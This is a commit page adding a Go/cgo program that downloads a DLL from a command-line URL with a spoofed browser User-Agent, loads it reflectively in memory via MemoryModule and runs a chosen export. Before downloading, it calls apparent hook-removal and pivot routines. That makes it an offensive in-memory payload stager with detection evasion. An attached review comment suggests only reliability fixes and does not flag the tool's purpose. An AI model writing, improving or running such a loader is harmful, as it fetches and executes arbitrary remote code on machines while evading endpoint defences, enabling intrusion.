~moody/dllcpf

160b30c96485c28be33bc41e79cf39a4f94bc736 — Jacob Moody 7 months ago d9d572a master
Add example go code
1 files changed, 59 insertions(+), 0 deletions(-)

A dllcpf.go
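--- a/dllcpf.go
+++ b/dllcpf.go
@@ -0,0 +1,59 @@
+package main
+
+// #include <stdio.h>
+// #include "MemoryModule.h"
+// #include "hook.h"
+//typedef void (*entryPoint)(void);
+//void execentry(entryPoint f) {
+//      if(f != NULL)
+//		f();
+//	else
+//		printf("[!!!] Couldn't find handle\n");
+//}
+import "C"
+
+import (
+	"io/ioutil"
+	"log"
+	"net/http"
+	"os"
+	"unsafe"
+)
+
+var entryPoint string
+
+func LoadFromMemory(b []byte) {
+	var f C.entryPoint
+	handle := C.MemoryLoadLibrary(unsafe.Pointer(&b[0]), C.size_t(len(b)))
+	if handle == nil {
+		log.Println("[!!!] Can't load Library")
+		return
+	}
+	f = C.entryPoint(unsafe.Pointer(C.MemoryGetProcAddress(handle, C.CString(entryPoint))))
+	C.execentry(f)
+}
+
+func main() {
+	if len(os.Args) < 3 {
+		log.Fatal("Usage: MemoryModule http://path/to/file.dll:8080 entryPoint")
+	}
+	entryPoint = os.Args[2]
+	C.UnhookAll()
+	C.SetupPivot()
+	client := &http.Client{}
+	req, err := http.NewRequest("GET", os.Args[1], nil)
+	if err != nil {
+		log.Fatal(err)
+	}
+	req.Header.Set("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.74 Safari/537.36 Edg/79.0.309.43")
+	resp, err := client.Do(req)
+	if err != nil {
+		log.Fatal(err)
+	}
+	b, err := ioutil.ReadAll(resp.Body)
+	if err != nil {
+		log.Fatal(err)
+	}
+	resp.Body.Close()
+	LoadFromMemory(b)
+}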
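Review bot: `LoadFromMemory` takes `&b[0]` without checking `len(b)`, and `main` never looks at `resp.StatusCode`, so an empty response panics with an index-out-of-range and an error page is handed to `C.MemoryLoadLibrary` as if it were the library; a guard such as `if resp.StatusCode != http.StatusOK || len(b) == 0 { log.Fatal("unexpected response: ", resp.Status) }` before the `LoadFromMemory(b)` call covers both. The string returned by `C.CString(entryPoint)` is never released; holding it in a variable and calling `C.free(unsafe.Pointer(cs))` afterwards would fix that, which needs `#include <stdlib.h>` in the cgo preamble. The bytes that get mapped and run come straight from the URL in `os.Args[1]` with no integrity check, and the usage text shows plain `http://`, so whoever controls the server or the network path decides what executes in this process; a doc comment on the exported `LoadFromMemory` should state that it executes whatever image it is given.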